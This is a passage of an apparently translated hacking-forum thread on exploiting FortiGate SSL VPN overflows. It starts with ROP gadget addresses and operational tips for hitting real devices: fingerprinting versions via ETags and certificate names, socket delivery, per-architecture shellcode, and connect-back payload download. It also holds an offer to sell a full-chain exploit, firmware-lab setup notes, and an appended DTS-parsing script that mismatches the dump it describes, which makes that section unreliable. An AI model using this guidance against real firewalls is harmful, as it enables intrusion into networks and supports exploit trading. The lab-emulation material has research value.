push rdx ; or al, byte ptr [rax] ; add byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: None
push rdx ; pop rsp ; add ebx, ebp ; ret: None
push rdx ; pop rsp ; add edi, edi ; nop ; ret: None
push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret: 0x00000000016254cd
VMDK Results:
AES_set_decrypt_key: 429ab0:
mprotect: 429b90:
AES_cbc_encrypt: 42c020:
calloc: 42c220:

Some gadgets have None as the address. That's OK, because they are substitutes for the stack pivot gadget, so if one of them has None as the address you can try the other pivot addresses.

Now you have the addresses you may need to construct the ROP chain exploit. Swap them in for the addresses in the PoC, and now you can test on the device.


You should also remember that if you can't get the right software and hardware version, you have to test all the ROPs to achieve the RCE.

So if you assemble Python code that retries for every version, you can achieve RCE after ~3000 tries at maximum.


BUT you have a better way: you can use CVE-2024-23662, read the ETag from the server response, and based on the ETag find the software version of the endpoint.

Each ETag is specific to one software version; you can get the ETag, decode it simply, and find the software version in it.

So after that you only have to try the ROPs for 35 different hardware versions [if you don't know the HWID].

Here is a tip for finding the hardware version: if the endpoint uses Fortinet's default self-signed SSL certificate, the device model appears in the Common Name of the certificate. So if you find FGT90D3Z13000759, for example, as the Common Name of a FortiGate SSL VPN endpoint, the device model is 90D.

Now you have fewer tries to achieve RCE :D

Another point about exploiting this vuln in the real world: in the PoC posted on Bishop, the engineer tries a POST request to achieve the overflow, but I would advise using a socket.

Connect to the socket and send the request to the endpoint to achieve the overflow. If you monitor the run flow in gdb, you can see a different crash pop up when you POST the request instead of using a socket.



The next point is about the shellcode used in the PoC. Remember that you should change it based on the arch the device uses. The shellcode in the PoC is for x86 assembly (used on all VM instances of FortiGate), but if you want to get shellcode running on arm32, you also have to change the shellcode for it. Also, when finding the ROP chain and the addresses of functions, you should use the best-matching version of objdump [this software has different versions for archs].


With all these points you can construct your own exploit code for use on real devices.


I will sell the full chain exploit code for this vulnerability and CVE-2023-27997, with 3 shellcode versions for different architectures and the full ROP chain addresses for 2800 software and hardware versions. It will also have a scanner based on CVE-2024-23662 for detecting the software version, and a pack of automatic ROP address extractors that you can use on every vulnerability where you need full ROP addresses, for example CVE-2024-21762. Contact me in PM.


-----------------------------------------------------------------------------------------------------------

P.S.: exploiting Xortigate (CVE-2023-27997) is similar to this PoC and exploit; just 1 byte after the payload you have to make some change to get RCE. You can use the shellcode in this topic instead of the Node.js payload used in the various articles, but in this code the SSL endpoint has to connect back to the server and try to download your final payload (silver, for example) and run it. It may be unstable sometimes and you need to try more.


P.S. 2: if you want to run the FortiGate aarch64 kernel on your virtual device, you should extract flatkc (the kernel file in the FortiGate appliance), binwalk the file and extract fortikernel.out from it, then edit the DTB file to match the hypervisor, and then you can run it with qemu-system-aarch64.

Remember that you should run U-Boot from SPI flash.
 
mkhalilovx29, awesome research. Can you write an article about unpacking firmware, running it in a VM and the debugging process, please?
 
mkhalilovx29, awesome research. Can you write an article about unpacking firmware, running it in a VM and the debugging process, please?
You can just work with virtual machines, or does that not suit you?
 
You can just work with virtual machines, or does that not suit you?
Anything will suit me, as long as there is a result and a description of every step. Dunno, maybe I'm bad at searching, but everywhere there are only scraps of info, as in "the intermediate things are obvious to everyone anyway, let's jump straight to the step where we found the right ROP chain and landed in EIP". And you sit there like, great, crystal clear! The train of thought is not clear, the intermediate stages are not clear. Most of the logic of the reverser's reasoning, how he arrives at particular results, is not clear at all. Apparently that's my dimwittedness.
 
Anything will suit me, as long as there is a result and a description of every step.
I have definitely never seen such a manual covering everything from start to finish, and besides, Forti is Linux, so you need vulnerability exploitation skills for that OS. In user-mode exploitation in particular, the bugs that appear there from time to time are heap vulnerabilities. So if you don't know heap exploitation techniques well, you might as well not even try. Because, say, you manage to reproduce one exploit, but you won't manage the second one, because there the exploitation method will already be different.
Hidden content for users: .
 
I'm not talking specifically about Fortis, but about various firmware in general. But thanks for the link.
 
I'm not talking specifically about Fortis, but about various firmware in general. But thanks for the link.
And I thought it was about Forti, eh... Well, otherwise it's working with binwalk, if it's various firmware.
That link got killed, by the way, precisely because I posted it publicly. Which is a shame; now it's only on archive.org.
 
Hi

Sorry, I forgot to answer this topic sooner.

Let's get into some explanation about Forti; maybe the questions about it will get answered.

Setting up a virtual lab for testing the PoC or exploits with Forti is not so hard, but you should know the differences between Forti versions to get on the right path.

For example, Forti firmware before 6.4.2 didn't have an encryption layer on the firmware, but after 6.4.2 they encrypt it. So if you want to play with the firmware file you should first decrypt it (if you want to do it on your own, there are multiple articles about it; you can find the encryption keys in the source and use them, sometimes they are hardcoded and not changed across multiple firmware files).

But you can also use ready-made tools and scripts for this, to extract the unencrypted file out of the file downloaded from the internet.

After that, again, you should know about the different protection mechanisms in booting the firmware after changing files in it.

For example, if I'm not mistaken, in version 7.4.x Fortinet implemented fgt_verify, which you should pass by making some change in the file after it has been modified and also by tracing the boot process, and then you should set the variable used for verification manually with gdb.

But the main process is the same as weaver said: you should unpack the main firmware file, replace the bash file in the init folder with your busybox, and also open some ports for yourself; after that add gdb, boot the kernel and start the tests.

P.S. 1: you can use qemu-system-x86 for running the main kernel of the Fortigate firmware that is made ready for KVM; download it from the official website or mirrors. From there you can attach gdb with the -s -S switches to fully control the debug process.

P.S. 2: you can also leave the files in the kernel unchanged. Fortinet has built-in tools for debugging received packets and managing crashes from there.

But if you want to play with the firmware files for the other architectures, your job is not as easy as this.

If you download, for example, the 60F firmware file, then apart from decrypting it, you should set up an emulation lab that matches the Fortigate devices.

This is based on different things:

1 - DTB file

2 - Device booting process

3 - Kernel initialization

When you read the Fortigate path for loading on the devices, you will find out that the kernel loads from SPI, NAND, USB, SD card, etc., so you can put the kernel in there.

If you find that the device saves the logs on the hard disk, you should attach a SATA hard disk to your QEMU.

From the DTB file you will find some device parts that are needed for the FortiSoC. This is an example of one Fortigate device's DTB file:

Code:
/dts-v1/;

/ {
    compatible = "ftnt,fsoc4";
    #address-cells = <0x2>;
    #size-cells = <0x2>;
    model = "Fortinet SOC4";

    cpus {
        #address-cells = <0x1>;
        #size-cells = <0x0>;

        cpu@0 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x0>;
        };

        cpu@1 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x1>;
        };

        cpu@2 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x2>;
        };

        cpu@3 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x3>;
        };

        cpu@4 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x100>;
        };

        cpu@5 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x101>;
        };

        cpu@6 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x102>;
        };

        cpu@7 {
            compatible = "arm,cortex-a53", "arm,armv8";
            device_type = "cpu";
            enable-method = "spin-table";
            cpu-release-addr = <0x0 0x20000000>;
            reg = <0x103>;
        };
    };

    clocks {
        #address-cells = <0x1>;
        #size-cells = <0x0>;

        arm_timer_clk {
            #clock-cells = <0x0>;
            compatible = "fixed-clock";
            clock-frequency = <0x1e0a6e00>;
            linux,phandle = <0x2>;
            phandle = <0x2>;
        };
    };

    pmu {
        compatible = "arm,armv8-pmuv3";
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x8f 0x4 0x0 0x90 0x4 0x0 0x91 0x4 0x0 0x92 0x4>;
    };

    timer {
        compatible = "arm,armv8-timer";
        interrupt-parent = <0x1>;
        interrupts = <0x1 0xd 0xf01 0x1 0xe 0xf01 0x1 0xb 0xf01 0x1 0xa 0xf01>;
    };

    interrupt-controller@f3140000 {
        compatible = "arm,gic-400", "arm,cortex-a15-gic";
        #interrupt-cells = <0x3>;
        reg = <0x0 0xf3149000 0x0 0x1000 0x0 0xf314a000 0x0 0x2000 0x0 0xf314c000 0x0 0x1000 0x0 0xf314e000 0x0 0x2000>;
        interrupt-controller;
        interrupt-parent = <0x1>;
        interrupts = <0x1 0x9 0xf04>;
        linux,phandle = <0x1>;
        phandle = <0x1>;
    };

    cci@f9000000 {
        compatible = "arm,cci-500";
        reg = <0x0 0xf9000000 0x0 0x10000>;
        ranges = <0x0 0x0 0xf9000000 0x100000>;
        #address-cells = <0x1>;
        #size-cells = <0x1>;

        pmu@10000 {
            compatible = "arm,cci-500-pmu,r0";
            reg = <0x10000 0x90000>;
            interrupt-parent = <0x1>;
            interrupts = <0x0 0xb0 0x4 0x0 0xb1 0x4 0x0 0xb2 0x4 0x0 0xb3 0x4 0x0 0xb4 0x4 0x0 0xb5 0x4 0x0 0xb6 0x4 0x0 0xb7 0x4>;
        };
    };

    aliases {
        rtc0 = "/amba/rtc@ffa60000";
        serial0 = "/serial0@fb000000";
        serial1 = "/serial0@fb001000";
    };

    serial0@fb000000 {
        compatible = "renesas,em-uart";
        reg = <0x0 0xfb000000 0x0 0x1000>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0xa 0x4>;
        clock-frequency = <0x2dc6c00>;
    };

    serial0@fb001000 {
        compatible = "renesas,em-uart";
        reg = <0x0 0xfb001000 0x0 0x1000>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0xb 0x4>;
        clock-frequency = <0x2dc6c00>;
    };

    ftmmc@f3010000 {
        compatible = "ftnt,socfpga-fsoc-mshc";
        status = "okay";
        reg = <0x0 0xf3010000 0x0 0x2000>;
        num-slots = <0x1>;
        broken-cd;
        dma-coherent;
        supports-highspeed;
        #stream-id-cells = <0x1>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x94 0x4>;
        fifo-depth = <0x400>;
        #address-cells = <0x1>;
        #size-cells = <0x0>;
        linux,phandle = <0x3>;
        phandle = <0x3>;

        slot@0 {
            reg = <0x0 0x0>;
            bus-width = <0x4>;
        };
    };

    sata@f3006000 {
        compatible = "snps,spear-ahci";
        reg = <0x0 0xf3006000 0x0 0x1000>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x90 0x1>;
        status = "okay";
    };

    usb3@f3008000 {
        compatible = "ftnt,xhci-fsoc-4";
        reg = <0x0 0xf3008000 0x0 0x8000>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x98 0x4>;
        clocks = <0x2>;
    };

    spi@fd300000 {
        compatible = "fsoc3,spi";
        reg = <0x0 0xfd300000 0x0 0x1000>;
        #address-cells = <0x1>;
        #size-cells = <0x0>;
        #cell-index = <0x1>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x0 0x4>;
        #clocks = <0x3 0x0>;
        status = "okay";

        spi-flash@0 {
            #address-cells = <0x1>;
            #size-cells = <0x1>;
            compatible = "mx66l51g45g";
            reg = <0x0>;
            ##spi-max-frequency = <0x66ff300>;
            spi-max-frequency = <0x2faf080>;

            partition@uboot {
                label = "uboot";
                reg = <0x0 0x200000>;
            };
        };
    };

    gpio@f501f500 {
        compatible = "fortinet,fsoc4-gpio";
        reg = <0x0 0xf501f500 0x0 0x100>;
        ngpios = ;
        gpio-controller;
        interrupt-controller;
    };

    watchdog@fbe02000 {
        compatible = "fortinet,wdt";
        reg = <0x0 0xfbe02000 0x0 0xfff>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x5 0x1>;
        status = "disabled";
    };

    pxab@f3000000 {
        compatible = "fsoc4,pxab";
        status = "okay";
        #stream-id-cells = <0x1>;
        #address-cells = <0x3>;
        #size-cells = <0x2>;
        #interrupt-cells = <0x1>;
        device_type = "pci";
        reg = <0x0 0xf3000000 0x0 0x2000 0x0 0xf0000000 0x0 0x100000>;
        reg-names = "Csr", "Slave", "Rst";
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x10 0x4 0x0 0x11 0x4>;
        interrupt-names = "dev0", "dev1";
        linux,phandle = <0x4>;
        phandle = <0x4>;
    };

    i2c@fb004000 {
        compatible = "renesas,iic-A9mp";
        reg = <0x0 0xfb004000 0x0 0x1000>;
        #address-cells = <0x1>;
        #size-cells = <0x0>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x7 0x1 0x0 0x6 0x1>;
        clocks = <0x2>;
        clock-names = "sclk";
    };

    i2c@fb005000 {
        compatible = "renesas,iic-A9mp";
        reg = <0x0 0xfb005000 0x0 0x1000>;
        #address-cells = <0x1>;
        #size-cells = <0x0>;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0x9 0x1 0x0 0x8 0x1>;
        clocks = <0x2>;
        clock-names = "sclk";

        rtc@51 {
            compatible = "nxp,pcf8563";
            reg = <0x51>;
        };
    };

    smmu@f3100000 {
        compatible = "arm,mmu-500";
        status = "okay";
        reg = <0x0 0xf3110000 0x0 0x10000>;
        #global-interrupts = <0x1>;
        calxeda,smmu-secure-config-access;
        interrupt-parent = <0x1>;
        interrupts = <0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4 0x0 0xf 0x4>;
        mmu-masters = <0x3 0x874 0x4 0x875>;
    };

    rtc@fc700000 {
        compatible = "fortinet,fsoc4-rtc";
        reg = <0x0 0xfc700000 0x0 0x100000>;
    };

    chosen {
        bootargs = "earlycon";
        stdout-path = "serial0:115200n8";
    };

    memory {
        device_type = "memory";
        reg = <0x0 0x0 0x0 0x7c000000>;
    };
};

As you see in the code, Forti devices have different components in them:

I2C, SATA, SD cards and so on.

You should emulate them all in your QEMU command, or sometimes you may need a new board definition among the QEMU boards. As you see in the DTB, you should also choose a valid GIC version for it to handle the right PMU; the strategy for firing up the CPUs is declared in it, as are how much memory is needed and the memory map for the components, which are the other parts of the DTB file.

Sometimes you will face failures after setting these up too, so you should check the kernel that is customized for your device. For example, as I said before, in the Forti firmware file (60F in this example) the flatkc file acts as the kernel for bootup.

If you use binwalk on it, you will get a fortikernel.out file that acts as the real kernel for loading the customized kernel for Fortigate devices.

If you debug flatkc with Ghidra or IDA (use vm-to-elf to convert flatkc to an ELF file that you can open in Ghidra) and trace the bootup process in Ghidra and gdb, you will face some functions that may not be present in default kernel files (for example a function to initialize the SerDes, customized for the FSoC, during the bootup process).

If you find all of them, sometimes you just need to bypass them instead of emulating all of them.

Another part is that after the lab is set up, you should start digging for vulns and exploits. First of all you should understand the vulnerability types and the differences between them.

You should know that if you face a stack overflow, you should use a different strategy than with a heap overflow vuln. If you want to exploit a heap overflow vulnerability, you should know the heap structure and how to spray it to achieve good results. Maybe you don't have this problem with a stack overflow bug.

Also you should know about the defense mechanisms of the file: ASLR, DEP, NX or any other? Using mprotect to run shellcode on a Forti device (shown in all the PoCs on the internet) for it. Or maybe Fortinet wants to use PAC in the aarch64 versions? Who knows the future? :D

Another word is about ROP chains. They differ across the vast range of architectures, but in the end creating them is like solving puzzles. It won't match on the first tries; you should test different strategies to finish the puzzle. So when you create your lab, crash the code for the first time, extract all ROP gadgets from the binary, and start thinking of them as puzzle pieces; try to jump to your shellcode and have fun.

If there is any question that I can answer, I will be glad to help.

------------------------------------------------------------------------------------------

At the end I want to paste some notes for everyone who wants to buy ANY Fortigate PoC or exploit, from now until the end of the era.

Please check these so nobody scams you:

1 - If you find somebody who sells ANY Forti exploit for an overflow vulnerability and doesn't have a file with different addresses, it's a SCAM. For every software and device model Forti has different addresses and different functions, so the address file will have more than 4000 lines, or if it is hardcoded in the main exploit, you should have a minimum of 5000 lines.

2 - If anybody talks about 1 exploit file for all Fortis, it's a SCAM. Fortigate uses more than 2 archs for the product, so the exploit should have different versions for these archs and for the shellcodes.

3 - Ask the seller 1 question [does your exploit work on FGT-300E?] and if the seller says yes, IT'S A SCAM (if the seller can do it, he has a 0day so it should sell for the highest price :D).
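The post above describes reading the DTB to learn which peripherals, interrupt controller, CPU release strategy and memory a Fortigate board expects before a QEMU machine can boot its kernel. The script below is an added example, not code from any poster in this thread or from Fortinet: it parses the textual DTS form that `dtc -I dtb -O dts` prints (the same form as the dump quoted above), decodes each node's `reg` with the parent's `#address-cells`/`#size-cells`, translates child-bus addresses through `ranges`, and lists every CPU-visible MMIO window together with the node's `compatible` string. That list is what you compare against a QEMU board's memory map to decide which devices have to be emulated, stubbed or bypassed. The embedded `SAMPLE_DTS` is a constructed, cut-down tree that imitates the quoted dump; it is not a real firmware file.

```python
# Added example (not from the post or from Fortinet): list the MMIO windows a DTS dump declares.
import re
# Constructed sample in the style of the quoted dump (`dtc -I dtb -O dts` form); NOT a real firmware tree.
SAMPLE_DTS = """
/dts-v1/;
/ {
    #address-cells = <0x2>;
    #size-cells = <0x2>;
    cci@f9000000 {
        compatible = "arm,cci-500";
        reg = <0x0 0xf9000000 0x0 0x10000>;
        ranges = <0x0 0x0 0xf9000000 0x100000>;
        #address-cells = <0x1>;
        #size-cells = <0x1>;
        pmu@10000 {
            compatible = "arm,cci-500-pmu,r0";
            reg = <0x10000 0x90000>;
        };
    };
    memory {
        device_type = "memory";
        reg = <0x0 0x0 0x0 0x7c000000>;
    };
};
"""

class Node:
    def __init__(self, name, parent=None):
        self.name, self.parent, self.props, self.children = name, parent, {}, []

def parse_dts(text):
    """Line-oriented parser for dtc output: one node opener, closer or property per line."""
    roots, stack = [], []
    for line in (ln.strip() for ln in text.splitlines()):
        if line.endswith("{"):                        # node opener, e.g. "cpu@0 {"
            node = Node(line[:-1].strip(), stack[-1] if stack else None)
            (stack[-1].children if stack else roots).append(node)
            stack.append(node)
        elif line == "};":                            # node closer
            stack.pop()
        elif line.endswith(";") and stack:            # property; a bare flag keeps value ""
            key, _, val = line[:-1].partition("=")
            stack[-1].props[key.strip()] = val.strip()
    return roots[0]

def cells(value):
    """Ints of a "<...>" cell list; a string, bare flag, damaged or absent value gives []."""
    m = re.fullmatch(r"<([^>]*)>", value)
    return [int(t, 0) for t in m.group(1).split()] if m else []

def cell_count(bus, prop, default):
    """#address-cells / #size-cells declared on a bus node, else the spec default."""
    return (cells(bus.props.get(prop, "")) or [default])[0] if bus else default

def join_cells(vals):
    """Concatenate 32-bit cells, most significant first, into one integer."""
    return sum(v << (32 * i) for i, v in enumerate(reversed(vals)))

def decode_reg(node):
    """(base, size) windows of `reg`, sized by the parent's cell counts; [] if absent/malformed."""
    ac, sc = cell_count(node.parent, "#address-cells", 2), cell_count(node.parent, "#size-cells", 1)
    vals, step = cells(node.props.get("reg", "")), ac + sc
    if not vals or len(vals) % step:
        return []
    return [(join_cells(vals[i:i + ac]), join_cells(vals[i + ac:i + step]))
            for i in range(0, len(vals), step)]

def translate(node, addr):
    """CPU address of a node-local address via each ancestor bus's `ranges`; None if not CPU-visible."""
    bus = node.parent
    while bus is not None and bus.parent is not None:
        if "ranges" not in bus.props:                 # no ranges at all: children are not mapped
            return None
        cac, pac = cell_count(bus, "#address-cells", 2), cell_count(bus.parent, "#address-cells", 2)
        step, vals = cac + pac + cell_count(bus, "#size-cells", 1), cells(bus.props["ranges"])
        windows = [(join_cells(vals[i:i + cac]), join_cells(vals[i + cac:i + cac + pac]),
                    join_cells(vals[i + cac + pac:i + step])) for i in range(0, len(vals), step)]
        if windows:                                   # empty `ranges;` means identity mapping
            hit = [pb - cb for cb, pb, sz in windows if cb <= addr < cb + sz]
            if not hit:
                return None
            addr += hit[0]
        bus = bus.parent
    return addr

def memory_map(root):
    """[(path, label, cpu_base, size)] sorted by base, one entry per CPU-visible `reg` window."""
    out, todo = [], [(root, "")]
    while todo:
        node, path = todo.pop()
        text = node.props.get("compatible") or node.props.get("device_type", "")
        label = (re.findall(r'"([^"]*)"', text) or [node.name])[0]
        for base, size in decode_reg(node):
            cpu_base = translate(node, base)
            if cpu_base is not None:
                out.append((path, label, cpu_base, size))
        todo += [(c, f"{path}/{c.name}") for c in node.children]
    return sorted(out, key=lambda e: e[2])

if __name__ == "__main__":
    for path, label, base, size in memory_map(parse_dts(SAMPLE_DTS)):
        print(f"{base:#012x}-{base + size - 1:#012x}  {label:<20} {path}")
```

A node on a bus that declares no `ranges` is skipped rather than guessed, following the device-tree rule that such regions are not CPU-visible, and a damaged property such as the `reg = Q;` in the quoted dump produces no entry instead of an exception, so the script can be pointed at an extraction-damaged dump as well as a clean `dtc` one. Run on a real dump, the output is the list of MMIO bases you check against `qemu-system-aarch64 -machine ... ` info or a custom board definition.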